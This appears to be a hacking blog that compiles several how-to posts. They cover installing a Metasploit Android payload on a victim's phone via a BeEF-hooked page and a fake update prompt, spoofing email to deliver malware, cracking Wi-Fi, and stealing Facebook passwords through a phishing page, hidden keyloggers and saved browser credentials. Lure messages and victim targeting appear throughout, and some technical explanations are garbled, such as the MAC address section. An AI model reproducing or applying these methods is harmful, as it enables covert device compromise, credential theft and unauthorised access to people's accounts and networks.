Monday, 27 November 2017

Install android apps without touching phone

As I promise you in the previous article that my next post will be related to android hacking. In this article, you will learn how to install apps in your victim phone easily or without touching his/her phone.
I know it is not easy to take someone phone then install the ap and if you forget to open the app then no results.
If you have any problem, suggestion let me know by comments I help everyone.
Note: This is for education purpose only. Please don’t misuse it.
Requirements
  • beef
  • metasploit
  • Patience  (most of the readers don’t have patience )
Practical
We will create an android payload or virus or malicious app using Metasploit. I already posted here to generated android payload using Metasploit check it.
After creating the app, you launch Metasploit and wait for receiving the connection. Here are commands
service postresql start;msfconsole
It will launch Metasploit. Further commands
use exploit/multi/handler;set payload android/meterpreter/reverse_tcp;set lhost <local IP address>; set lport 4444
Remain this terminal as and follow further steps.
Launch beef. In Kali, you can start from the sidebar.launch beef in kali linuxIn parrot or any other security distribution, you can launch using this command.
beef-xss
Beef is browser exploitation framework. No matter either victim is using chrome, firefox you will not face any problem.
As you can see in the screenshot, it asks for the username and password. These are default username and password.
beef
beef
beef default username-password
After the successful login, a new webpage will open where in the sidebar, there are two directories online browser and offline browser. We can hook browser using a script then we will able to run own codes to the victim browser. When you hook a browser, it will show in the online browser. If it is confusing, don’t worry you will understand everything.
Beef also launch a terminal when you start it. Here is the screenshot of terminal I have highlighted the example remember it we will use in future.hook browser example
To hook own browser visit this link http://127.0.0.1:3000/demos/basic.html or insert script tag. When you open this beef will show something like this.
hooked browser
Meaning you hooked your browser (127.0.0.1 mean your browser).  Click on 127.0.0.1 and choose commands. In the commands tab expend social engineering and pick Fake update bar (chrome) because I’m using chrome you can find victim browser using details tab.fake update for android hacking
Open a new terminal and type ifconfig to find your IP address.
In my case, it is 192.168.43.7.
To hook a victim, my URL will be http://192.168.43.7:3000/demos/basic.html.
Connect your phone to the same network that you are using on your computer. Open this URL on the android phone here is what I got on the beef control panel. In the commands expend social engineering and choose Fake update bar (chrome) because I’m using chrome you can find browser using details tab.
In the URL we will place our android payload URL. You can upload payload to the very famous website like google drive or start own server.
fake update for android hacking
Just run this command.
service apache2 start
After this copy your android virus that you generated in the first step to /var/www/directory. So URL of the Android virus is http://<IP>/appname.apk
I think you know how to find local IP address. Paste in URL tab of beef and click on execute.
On executing your android phone will show you something like this.
installl missing plugins (hack android phone using metasploit
If you choose Install Missing Plugins, then the app will start downloading.hack android phone
Tap on open, the app asks for installation. After installing when you open it, you will be in the browser app (because our app will display nothing). installl and opening app
But we will get a meterpreter session.
session open
I already posted how to hide app icon, get meterpreter season again and again in the first post of Android hacking.

How to perform a real task

In the actual case, we can’t send the link like this. Your victim will close tab immediately. So we should create something engaging.
I found a snake script. It is the game developed using JavaScript you can download it from GitHub.
Note: This game only works with arrow keys. Maybe android user will be unable to play the game. So we will show install missing plugins to play the game.
Here are simple steps to do this.
First of clone this game from Github.
git clone https://github.com/Mariacristina88/Snake-game.git; cp -r ./Snake-game /var/www/html; nano  /var/www/html/Snake-game/snakegame.html
If above Linux commands confuse you then read my Linux commands for beginners post. Semicolon (;) is used to run two or more commands in the single line.
It will download and copy the game to HTML folder and open snakefile.html. Just insert this script tag.
<script src="http://192.168.43.60:3000/hook.js"></script>
Press ctrl+o to save ctrl+x to exit.
Now, send URL http://192.168.43.60/Snake-game/snakegame.html to your victim. You can port forward your router to perform it over the internet.
Now when our victim opens the link, he will see something like this.how to hack android phone part 2
And we will get hook that browser.  After that repeat above steps to install apps
Tip: you can add custom CSS to make fake update clear. So our victim will install app successfully.

Part-2 Email spoofing

As clear from its name we will spoof our email address. I mean you can send email from any address (yeah from even bill gates email address, do you have bill gates email address?). To spoof an email address, you need only SMTP settings.
Don’t confuse by above words there are tools and websites.
I use https://emkei.cz/ For sending spoofing emails.
This website has a straightforward interface. Just enter to, from, subject, message and send the message.
But Gmail service will catch it and move emails to spam.
In case if your victim is using webmail service then 99% chances are that your message will appear in the inbox.
Here is the screenshot of mail I send to my webmail using this website. fake email example
Thus using spoofing email, you send the malicious app to your victim. Just make sure your message should be real and quick.
Problem with this method is who used webmail on the android phone, or my victim is using Gmail.
Well, this is part of social engineering. You should find your way to hack your victim phone. Don’t we will go further in advance of Android hacking but due to exams i will publish next article in futue.

how to change mac address in kali linux

Macchanger is a tool used to change mac address in Linux. In kali and backtrack it is pre-installed on other distribution you can install it manually (type macchanger in the terminal to know how to install) by reading this tutorial you can spoof  Mac address of any interface like eth0, wlan0 etc.
If you are new Kali Linux then before starting tutorial you need to know what Mac Address is and why you need to change it. Generally, an error you need to down interface if you not down this then there will an error occur  ERROR: can’t change mac address: interface up or not permission: Cannot  assign requested address while occur while changing mac.
Also, read:
What is Mac Address?
Mac stands for Multimedia access control. It is basically our computer’s hardware identification or while connecting an Ethernet or Wi-Fi an identification of our device is needed that id is our Mac id. Every device has unique Mac id and you can’t change it permanently but you are able to spoof for some time it with macchanger.  Wi-Fi address is 12-bit long ex. E2:F3:W3:34:56:67 in Every id first three digits E4:F3:W3 are the identity of manufacture and last three digits 34:56:67 are made by the manufacturer. The Same way our Ethernet id is made but it 10 bit long. Remember Ethernet and Wi-Fi address are not same these are two different-different interfaces. To know your real id go to setting→network→wireless.
Did not understand: Turn hotspot on of your phone and connect any device with this network now on connected device open hotspot settings and in connected user an id like E2:F4:R3:56:78:90 is showing that is mac id of the connected device.
Why do you need to change it?
For the normal purpose, there is no need to spoof but in hacking, it has many benefits.
Bypass Mac filtration security: This is wireless network security. In this security only allowed device are able to connect to wifi other device are unable to connect because as I tell you above by default every device has a unique id so only allowed devices can connect to wi-fi. To bypass this security you need to spoof your id.
While hacking a router: If you want to full control by hacking router then you should spoof Mac id because if the admin sees any activity from your computer id then admin can block but you if your wifi address is not real then you can reconnecting to the network.

How to Spoof Mac

It is very easy. In this tutorial I will change my wireless adapter address but I will I also tell you how you can change other  adapter addresss.
open terminal and type ifconfig. it will show you all the adaptersifconfig
How to change wlan0 address: Type following commands to spoof wlan0 interface
root@kali:~# ifconfig wlan0 down
              
For changing id manually then type macchanger –m  fake address wlan0 for example
root@kali:~#
macchanger –m 12:12:12:12:12:12 wlan0
If you want to change your id automatically then type
macchanger -a wlan0
And for random change replace -a with –r
And in the last type
root@kali:~# ifconfig wlan0 up
For turning off spoofing type 
ifconfig wlan0 down
Ifconfig -p wlan0    // -p mean permanent
ifconfig wlan0 up
Now your wifi address interface id is successfully changed you can connect your PC with phone’s hotspot for verification if you are not able to buy a router.
How to change eth0 interface: To spoof eth0 address just replace eth0 with wlan0
Ifconfig eth0 down   //Type only if you are using ethernet
Macchanger -r eth0
Ifconfig eth0 up
Tip: For bypass mac filtration security change wlan0 not mon0 although you enable mon0 interface. If your internet stop working then disconnect and network and connect again to it.
Reason error occurring on changing Multimedia access control?
Most of the times we do not down interface
If we do not type correct syntax for wlan0 XX:XX:XX:XX:XX:XX and for eth0 XX:XX:XX:XX:XX replace xx with any numerical or alphabet.
If you running dual os using Virtual box then you need to buy a wireless adapter for wlan0.

how to hack password full working


WiFi means free internet. if you want to hack someone WiFi password this post is the perfect guide for you. No matter you want to hack school, office, college or your neighbor network. Keep patience while you are reading this article.
how to hack wifi
I always prefer Kali Linux operating system for hacking. Kali has preinstalled all tools that are needed in wifi hacking like aircrack-ng (best software to crack a wifi). No doubt some software also available for window and android user but can’t compare with kali.
Ok in our society there are mainly five types wifi security available.
  1. WEP security
  2. WPA security OR WPA2 security
  3. MAC ADDRESS filtering
  4.  HIDDEN network
  5. WPA2 (WPS available)
  6. OPEN network

Can android  Hack WiFI

ok, read my words very carefully. Android can hack only WPS WiFI security. This is the brutal truth. If you find a tutorial how to hack WPA with Android believe it is fake. you will waste your Time.
what is the problem with android
Problem with android is that wireless card does not support monitor mode. Monitor mode is very important. You can’t hack WPA without monitor mode.
Bottom Line: Don’t waste your Time.

How hackers hack wifi

Here I have explained working of all mention hacking of all securities one by one
    • WPA SECURITY OR WPA2 SECURITY

    When WEP become easy to crack then WPA (Wi-Fi protected access) is discovered. It has two formats WPA and wpa2 (this is advance). WPA is secure as compare to WEP. WPA password hacking depends upon the user awareness towards IT.
    Today It is the best security to protect your network if you put a strong password. Here are two ways to crack WPA or WPA2
    1. Word List Attack
    2. Fluxion. (Best way)
    Word List Attack: This is the most useful method to hack WPA. In this method, the hacker creates a word list with the help software like crunch. That’s it will make word dictionary that containing all word of characters typed by you.
    After making word list, you need software that will try these words as a password.  Aircrack can try 900 words/second or more depending upon your system configuration. If your password is your name+anything like a digit, then it is easy to crack.
    Fluxion attack:In this hacker show WiFi user something like this. When user enter password user will able to use WiFi otherwise not.fluxion wifi hacking password forum for victim
  • WEP SECURITY

 WEP stands for Wired Equivalent Privacy. This is the first security discovered of Wi-Fi invented in 1999 and crack within the year.
It is very easy to crack. People did not understand the working of hacking WEP wifi but able hack it. There is an initialization vector send over all the network if you capture Initialization vector you crack WEP password. You can crack it within 20-30 minutes. No matter how strong your password is.
Software to crack it: aircrack Not only WEP using aircrack you can also hack other wifi passwords like WPA, wpa2a. Aircrack is available for both Window and Linux.
How to hack in the window: For getting the password in you need to install this aircrack-ng. Happy news for non-coder because there is no need to code window the window operating system. Bad news for window user is it will take 4-9 hours. Check here full process from installation to Hacking. This process is working for all window like 7.8,10
Hack in Linux: No matter which Linux distribution you are using you need only one tool again aircrack. Find out here how to install aircrack-ng any Distribution. After installing, this there are some simple commands. If you are using Kali on the virtual box, you need to buy a wireless adapter. Here Click here to know cracking process
How to protect
Don’t use WEP security use any other security.
  • MAC ADDRESS FILTERING

In this only register device are able to connect the network. Every device has unique mac address. Using these mac address admin allow only his device to connect the WiFi. All other device are unable to connect.
To bypass this security hacker just need to know Mac address of a registered device, and then he changes your Mac address means to make it similar to register device Mac address. You did not physical access to the device to know mac address. Using aircrack-ng you can know mac address of the connected device to any network.
Window Tutorial: If you are window sorry you have to know mac address of registered device manually mean no software for. Running live Kali Linux is a good choice. Anyway once you know  mac address then you can change your mac here is tutorial
Linux Tutorial: Linux is always preferred for any hacking. If you are not running Kali Linux type aircrack-ng in the terminal to know to how to install. After installation follow this process 
Android tutorial: In android you have to know mac address. Here is how to find mac in android device. After knowing mac address you have to root your phone. After rooting you can change mac address using WiFi mac changer app
How to protect
  1. Reduce your signal.
  2. Apply any other security with Mac address filtration.
  • Hidden network

 As clear from this name it is hidden you can’t see it turning on your wifi you have to enter network name manually. In windows os when they detect hidden wifi a symbol of hidden network while connecting asking network name. On the internet, you can find software and apps available to hack this.
Window tutorial: finding a hidden network is easy as on Windows as compared to WPA security.  Here are eight best wifi scanner.
Android Tutorial: Sorry not  possible. All apps are fake.
How to protect
  1. Reduce your wifi network signal.
  2. Apply any other security with hidden wifi.
  • WPS enabled

 WPS stands for wireless protected Setup but it will insecure your network. it is also known as WPA-PSK. In this, there is 8 digit pin you can use this pin as a password. The router has 8 digit PIN that you need to enter while connecting, the router checks the first four digit separately and last four digits separately which become very easy to crack by brute force attack. WPS Wi-Fi can be hacked only in 40 minutes using pixie dust with Reaver.
Linux tutorial: you need to type some commands for this.  As you know Linux is best for any type of hacking. WPA-PSK pin code can by got by aircrack-ng software no need to install in kali and backtrack. This post will help you to know how to hack WPA-PSK (include screenshots).
Window user : you can crack this within 5 minutes or less. Install wincap and jumpStart in your window [10,8, 8.1 etc] and see this video to bypass this step by step.
Android tutorial: WPS Connect is the only app which can help you to bypass this. It is free available in google play store but makes sure that your Android version is at least 5.0 mean Lollipop and phone is rooted.
How to protect
  1. Don’t enable WPS
  • OPEN Wi-Fi

 Are thinking what is need of hacking open Wi-FiOpen network hacking means control full network. Yes, you are right that our college network. To control full Wi-Fi hacker need to hack the router. Every router has the default username and password, and in today’s world more than 90% router has their default password and if you change password, then a hacker can use brute force attack, word list attack, Man in the middle attack or keylogger to hack the router.

Next post

Metasploit Tutorial for beginners: Master in 5 minutes

In this post, we will talk about the Metasploit framework. I am sure you have enough heard about Metasploit and maybe still confuse what is this and how to use it? It is framework mean it is the collection of number of Softwares. You can gather information, make malware, hack FTP, hack Android, and many other things. You will know when you use it. It is pre-installed in Kali or parrot OS. It has paid and free version. Off course, Kali has a free version. Not only in Kali you can install it in the window too. Metasploit is also integrated

full form of hacker

First of all, Who is Hacker??
full form of hackerHacker is the person who tries to access your computer, Online accounts like facebook, Your wifi, mobile without admin permission.
Also, read:

Full form of Hacker

Hacker stands for
H – Hide IP
A – Aim Victim
C – Crack Encrypt
K – Kill Firewall
E – Enter into Database
R – Return Anonymous
H – Hide IP
 what is IP address: IP stands for Internet protocol do not get confuse by full form basically, this is the address of your device every device (does not matter smartphone or computer) has unique IP address like mobile search on Google my IP you will find your Ip address
ip address using google
Find ip using Google type my IP
This is my public IP there are two types of IP
  1. Private IP
  2. Public IP
From a network, all device are communicating with the Internet from a single public IP address. Public IP can be same but Private IP can’t same of two or more devices.
How can you Hide IP
Hide IP address means to change or spoof your internet protocol address so sites that hacker visit to get a fake Ip address hackers can hide IP with the help of Vpn and proxy sites.
What is VPN  A VPN (Virtual private network) connects two devices securely and privately over the internet through Public IP address. No one able to see I what information is exchanged.
How it works: To Understand working of VPN see this picture Here is first path without VPN here we directly connect with any site and they get our IP but when we use VPN first of all,we connect a third party server and server connected to site and site got server IPworking-of-vpn

On hiding identity, no one  can trace hacker so he/she will not be caught on hacking websites.
A – Aim Victim
Aim victim means if you want to hack facebook account of b then b is your victim.
C – Crack Encrypt
encrypt data means convert information into a cipher or code, especially to prevent unauthorized access. Now crack encrypt means find data that encrypt our account data(username and password) is encrypted by company hackers can use Man in Middle Attack to decrypt data
 K – Kill Firewall
Firewall:  These are basically parts of a computer that are used to block unauthorized access to a network. Every college wifi uses a firewall to block sites. Now kill firewall mean that access blocked content.
E – Enter into Database
Database: basically this is a structured data on a computer, especially one that is accessible in various ways. For example, we open a Facebook account by typing password and username because Facebook has made a database for accounts. Enter into database means that full access to a database by unauthorized access.
R – Return Anonymous
Return anonymous means that Go back without getting any hint to the victim.

Hack Facebook account password with android phone

hack fb account using android phoneAndroid is more than the operating system has incredible features. In this post, we will talk about how can you hack  Facebook account using Android. This process is very simple you do not need any technical knowledge just follow given steps. Some attacks are also working on other accounts like Twitter, Gmail, etc.
Also read: Latest 42  WhatsApp Tricks for Android
How to hack wifi password from android
Before getting the start I want informs you there is no universal method which can hack all accounts. It will depend upon on your friend’s knowledge etc. There are mainly 6 methods to hack accounts through Android.
There are many fake apps available in Google play store with the name of hack Facebook/FB. A few of them are paid but not a single app work. Do you think the Facebook owner is stupid? The company spends millions of dollars to take care their user security.
Here is an app is known as Password FB hacker prank downloaded by 50000 thousand users.password fb hack pranklet what is company documentation about their app.password fb hack prank documantionactually, there is no real app or website [all are fake] to hack  Facebook accounts but don’t be sad follow these methods
Do you know
Facebook pays at least $500 who find any security hole in Facebook. If all accounts could hack with a website then why they will do free. They will submit error to FB to make money like Jack Whitten. He finds a way to hack all Fb accounts, and he submitted error and received $20000. Online accounts could be hacked by making user fool.
Here are all ways to making a Facebook user fool to get his/her password.
Dissimilar: This is only for knowledge I am not responsible for any security issue.
.
Methods to hack FB using Android Mobile
  1. Using anomor
  2. Making fake login page of Facebook login URL known as phishing
  3. By making fake Application
  4. Using spy & keyloggers application
  5. Using auto save feature of browser
  6. By changing the password without knowing current password.

How to hack FB account step by step

Using anomor: This is website anomor.com which helps to hack FB account [it is not automatically]. It is the easiest way to hack fb from mobile
Here is how can you use it.
  1. Open Anomor.com and make an account it is required.
  2. Now login your account and click on link 1 in front of Facebook as shown in the screenshot.anomor
  3. It will something like http://fbapps2.ga/qi/firsstpage/?i Just send this link to victim If he/she enter the password you will get the password.facebook hack anomor
How to see password
  • Login your account to anomor.com.
  • Click on My victim and you can see this username and password.anomor victim
Make fake login page of the Facebook Login page:  This is old, best and easiest method to hack Facebook account not only mobile also work desktop. In hacking, it is known as phishing.
To understand phishing see this screenshot which looks like Facebook login page but in reality, it is fake ( phishing page have a different URL).
In other words, It is website look like original Facebook.   fake login fake of facebook (phishing)If anybody login here he/she will redirect to the Facebook and his username and password will be saved in text file. Like other you do not need any coding, it is just simple paste coding. I think this is the best way to hack accounts and most famous for hacking accounts.

How to make fake login page screenshot guide

You can create the fake login page using wapka mobi But you can’t open this fake page in UC browser for opening in UC here is full tutorial step by step with screenshots to make phishing page.
  • Download this attachment file from here or try alternative
  • it includes 9 files (data.php, data1.php, index.php, Mobile_Detect.php, desktop.jpg, follow.jpg, login.jpg, desktop_files(folder), users.txt)  as shown in screenshotfb-phishing-page-files
  • Step 2 signup for a free web hosting
    000webhost is good
    Note: Use UC, chrome or firefox browser.
  • Open signup form of ooowebhost and fill the all signup form and click on button Get Free Hosting. (Make sure you typed a sub-domain or pay money if you choose other). [00webhosting will not detect this page]. Your subdomain should look like original FB so your victim unable to identify it e.x faceb0okloginearnmoneyhosting forms to make phishing page
  • Make sure you verify your account by email address after verifying you can see the active status and choose to go to Cpanel as shown in the screenshot.active status after making verfiying email address
  • Next step is about uploading so choose file manager.file-manager-to-upload-phsihing-files
    Note: there are also file manager 2 and 3 available, but you choose file manager as shown in the screenshot.
  • Next step you need to open a public_html folder and uninstall two files that already exists after deleting them choose upload button.uploading files in public_html folder
  • Below “Archive” section on the right side click on “Files“, Then tap File Manager and Select the downloaded zip file in step 1 (responsive-facebook.zip).uoploading-optionchosing-file-manager-to-upload-files
    After uploading click on the green button.
    Wait to until uploads file size is not big you can upload using the 2g connection.successfully upload message by extracting filesDone
    you can access fake page adding  /?=facebook,
    accessing fake page by /?=facebook to bypass security it will help you to bypass the security check up here is an example
    www.facebookdemo.comli.com/?=facebookfake login fake
    When victim login his account by email and password it will save in users.txt file
    to view password open file manager→public_html→users.txtusers.txt file with a saved password
How to send fake login URL to your victim or friend: Send a message with the description like Hey, Name login here Fake page URL It will make money for me. You can also use WhatsApp send a message like Facebook recently buy WhatsApp now they are combining WhatsApp and Facebook to enhance Facebook and Whatsapp behavior you have to log in here your page URL. Otherwise, your WhatsApp account will be suspended shortly. Keep your message short and don’t make any grammar mistake.
How to protect yourself:
  • Use good browser in like Chrome, Firefox in mobile some browser like Opera will not detect this phishing page
  • Mobile user should use Facebook app
  • Always check URL before login if you are logging in.
Cons
  • Facebook take user security seriously, so your URL will work only for 2-3 months after Facebook will not allow you to send URL
  • Now people are much more intelligent  knows about Phishing
By making the fake application:  There is no app to hack FB, but you can make an own app. Currently there no source where you can find how to make fake facebook app (some fake available on the internet). You have to learn to code for this. Find here how to development Android apps.
On the web, you can find many fake methods to create the fake/phishing facebook app. But I have tried these tricks are not working now.
Using spy & keyloggers application: These are some application using record every keyword type by the mobile user. Very easy to use you just need to install in your victim phone or install in your phone and convene your friends for login on your phone.
There are both paid and free applications available in play store. The paid software can be hidden, but for hiding free apps, you need a good launcher for your phone.
How to hack
choosing-shadow -keyboard
  • The last step open any app where you can open keyword like the message to some or opera mini browser. Scroll notification bar and tap on choose Input method and select English (Us) simple IME as shown in the screenshot.enable-shadow-keyboard
  • Now you are ready to view keywords type by victim open shadow and chose View to log in HTML viewer[proof shadow keylogger records every keystroke
If you install it in victim phone, then make sure you hide it you can hide it with the launcher like nova launcher and if can’t hide then apply password on it. To apply password open shadow→AUTHENTICATE
Tip: If your victim has messenger then go to settings→apps→messanger and clear data it will log out this account from messenger and he should login his account again.
How to secure your account
  • Never login in your friend’s mobile if necessary primary then Check keyword before login it should look like normal.
  • Install only trusted apps there are some apps available which can steal your information there is no scan in the play store so hackers can submit their apps quickly.
Cons
  • Not easy to install in victim phone.
  • Not easy to convey victim to login in your account.
Autosave feature:  In some browser, there is any option for autosave which will automatically save passwords and username without user information. It is also simple you just need change some settings in your browser.  Mainly two browsers which have auto save feature and you will definitely have these browsers. You can log in any time by pressing Login button. It is same as you save your password.
  1. UC browser
  2. UC Mini
Settings to change
  • Open Uc browser and in menu tap on settings→Browser settings and change form and password settings to auto save as shown in the screenshot.auto save settings in uc-browser
  • Now your browser is ready just ask your friend to log in his password will automatically save you can login in his account without his password
If you want to see his password, then you follow given steps.
  • Open saved password web page here is facebook.comview save password by uc
  • Tap on password field now types anything after typing one word you will show button click on that to view password facebook web page
By changing the password without knowing current password: This is unique URL where you can modify the password without knowing the current password but doesn’t over excite it is not working for all accounts. If your victim forgets to log out his account from your phone or you can access your victim phone where he already login his account and change password with the help of this URL
https://www.facebook.com/hacked visit now
Cons
  • Needed an already log out account
  • Not working for all accounts
By Guessing:  This method does not need the technical term. It is just simple in hacking it is known as social engineering. Now don’t think like stupid. Mainly people use their mobile number girlfriend, boyfriend, city or village name, nickname, etc. or the combination of these words. But it will take much more time.
How to protect by UC browser
There is only one way to protect your account by putting the secure password. To make secure password think any sentence, for example, Khuspreet is one of my best friends. Now take the first word of each word it will look like kioombf. Which is 100% unguessable you can also add special sign like !@#$ and plus special sign like <>%^&*(  to make your password stronger.
Cons
  • Very very difficult
  • Facebook will not allow using weak password

Hacking methods that are working not more

There are some methods available which are not working, but some bloggers are posting that given blow.
Using binu app: Binu is an app that in this (talking about the previous version) you can log in your Facebook through a ULR which asks your message, public profile permission. The hacker sends that URL to the victim. When the user allows this app hacker will login his account without the password. This trick goes viral. But now binu owner Delete Fb login from the app. Now this tutorial is working no more
Faceniff: I don’t know why some bloggers provide hack Facebook using Android with the faceniff tutorial I also tried but not working.